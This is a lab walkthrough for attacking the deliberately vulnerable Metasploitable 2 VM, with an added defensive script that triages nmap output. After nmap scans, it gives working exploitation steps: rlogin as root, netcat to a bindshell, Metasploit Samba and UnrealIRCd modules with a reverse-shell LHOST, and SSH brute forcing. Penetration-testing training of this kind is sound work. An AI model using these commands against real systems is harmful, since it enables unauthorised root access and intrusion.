The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. By default, Metasploitable’s network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network.
Getting Started
After the virtual machine boots, log in to the console with username msfadmin and password msfadmin. From the shell, run the ifconfig command to identify the IP address.
Running Services:
From our attack machine, we run a scan to identify open ports and running services on the vulnerable machine.
nmap -p- <machine_ip>
We got the following result:
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
6697/tcp open ircs-u
8009/tcp open ajp13
8180/tcp open unknown
8787/tcp open msgsrvr
34423/tcp open unknown
34841/tcp open unknown
44265/tcp open unknown
51815/tcp open unknown
Now it is time to run an aggressive scan against those ports to identify the versions of the running services and check for common vulnerabilities.
nmap -A -p 21,22,23,25,53,80,111,139,445,512,513,514,1099,1524,2049,2121,3306,3632,5432,5900,6000,6667,6697,8009,8180,8787,34423,34841,44265,51815 <machine_ip>
We got the following result:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.101
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: 2025-01-04T11:31:42+00:00; +2s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-title: Metasploitable2 - Linux
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
111/tcp open rpcbind 2 (RPC #100000)
|_rpcinfo: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 11
| Capabilities flags: 43564
| Some Capabilities: Support41Auth, LongColumnFlag, ConnectWithDatabase, SupportsTransactions, SwitchToSSLAfterHandshake, SupportsCompression, Speaks41ProtocolNew
| Status: Autocommit
|_ Salt: Hw@vS|67RtscxStmIc6%
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
|_ssl-date: 2025-01-04T11:31:41+00:00; +1s from scanner time.
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/5.5
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34423/tcp open nlockmgr 1-4 (RPC #100021)
34841/tcp open java-rmi GNU Classpath grmiregistry
44265/tcp open status 1 (RPC #100024)
51815/tcp open mountd 1-3 (RPC #100005)
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2025-01-04T06:31:34-05:00
|_clock-skew: mean: 1h15m01s, deviation: 2h30m00s, median: 0s
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
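Before moving on, it helps to turn the scan output above into the list of issues a defender would have to fix. The script below is an added example, not part of the original walkthrough: it parses nmap's normal output (the PORT STATE SERVICE VERSION rows and the '|'-prefixed NSE script lines) and flags cleartext protocols, anonymous FTP, SSLv2, the expired certificate, the bindshell and disabled SMB signing. SAMPLE is a constructed excerpt of the scan; the CLEARTEXT set and the rule strings are my own choices.

```python
"""Triage nmap -A normal output (the layout shown above) into defender-facing
findings. Added example, not from the original walkthrough; SAMPLE is a
constructed excerpt of the scan output."""
import datetime
import re

SAMPLE = """\
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
| SSLv2 supported
|_Not valid after: 2010-04-16T14:07:45
513/tcp open login OpenBSD or Solaris rlogind
1524/tcp open bindshell Metasploitable root shell
Host script results:
|_ message_signing: disabled (dangerous, but default)
"""

CLEARTEXT = {"ftp", "telnet", "exec", "login", "shell"}  # no encryption at all
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
SCRIPT_RULES = [  # (lower-cased substring of an NSE script line, finding)
    ("anonymous ftp login allowed", "anonymous FTP login permitted"),
    ("sslv2 supported", "SSLv2 offered (obsolete protocol)"),
    ("message_signing: disabled", "SMB signing disabled (tampering risk)"),
]

def triage(nmap_output, today=None):
    """Return (port, finding) tuples; today is an ISO date string (compares as text)."""
    today = today or datetime.date.today().isoformat()
    findings, port = [], None
    for line in map(str.strip, nmap_output.splitlines()):
        if m := PORT_RE.match(line):  # a new PORT STATE SERVICE VERSION row
            port, service = int(m.group(1)), m.group(3)
            if service in CLEARTEXT:
                findings.append((port, f"cleartext protocol ({service})"))
            if service == "bindshell":
                findings.append((port, "unauthenticated shell listener"))
        elif line.startswith("Host script results"):
            port = None  # host-level scripts are not tied to a port
        elif line.startswith("|"):  # NSE script output for the current port
            text = line.lstrip("|_ ").lower()
            findings.extend((port, f) for n, f in SCRIPT_RULES if n in text)
            exp = re.match(r"not valid after:\s*(\d{4}-\d{2}-\d{2})", text)
            if exp and exp.group(1) < today:
                findings.append((port, f"TLS certificate expired {exp.group(1)}"))
    return findings

if __name__ == "__main__":
    print(*triage(SAMPLE, "2025-01-04"), sep="\n")
```

Feeding it the full `nmap -A` output file instead of SAMPLE yields the same checklist for every port the scan saw.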
Time For EXPLOITATION!
1. Unix Basics:
Known as the “r” services, TCP ports 512, 513 and 514 are misconfigured to allow remote access from any host (the classic “.rhosts + +” scenario). To take advantage of this, run the following command as your local root user, after confirming that the rsh-client package is installed (on Ubuntu). If you are prompted for an SSH key, the rsh-client utilities are not installed and Ubuntu is falling back to SSH.
Exploitation Command:
rlogin -l root 192.168.56.4
or
rlogin -l msfadmin 192.168.56.4
Using the first command, we got a shell as root.
2. Using bindshell on Port 1524:
1524/tcp open bindshell Metasploitable root shell
Exploitation Command:
nc <machine_ip> 1524
Using this command, we get a root shell.
3. Using Samba on Port 139:
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Msfconsole Exploitation commands:
search samba
use exploit/multi/samba/usermap_script
set RHOSTS <machine_ip>
run
Now we get a root shell.
Make the shell session more stable:
python -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
4. Using IRC Port 6667:
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
Msfconsole Exploitation commands:
search UnrealIRCd
use 0
set payload 6
set RHOSTS <machine_ip>
set LHOST <your_machine_ip>
run
We got a root shell.
Make the shell session more stable:
python -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
5. Brute Forcing SSH Credentials:
Msfconsole Commands:
use auxiliary/scanner/ssh/ssh_login
set rhosts <machine_ip>
set user_file <username_file>
set pass_file <password_file>
exploit
We got a hit: msfadmin:msfadmin.
Now we can connect over SSH with these credentials using the following command:
ssh -o HostkeyAlgorithms=+ssh-rsa msfadmin@<machine_ip>
If you visit http://<machine_ip>:80 you get a list of vulnerable web applications on which you can practice web application vulnerabilities.
Happy Hacking!
Hack The Planet!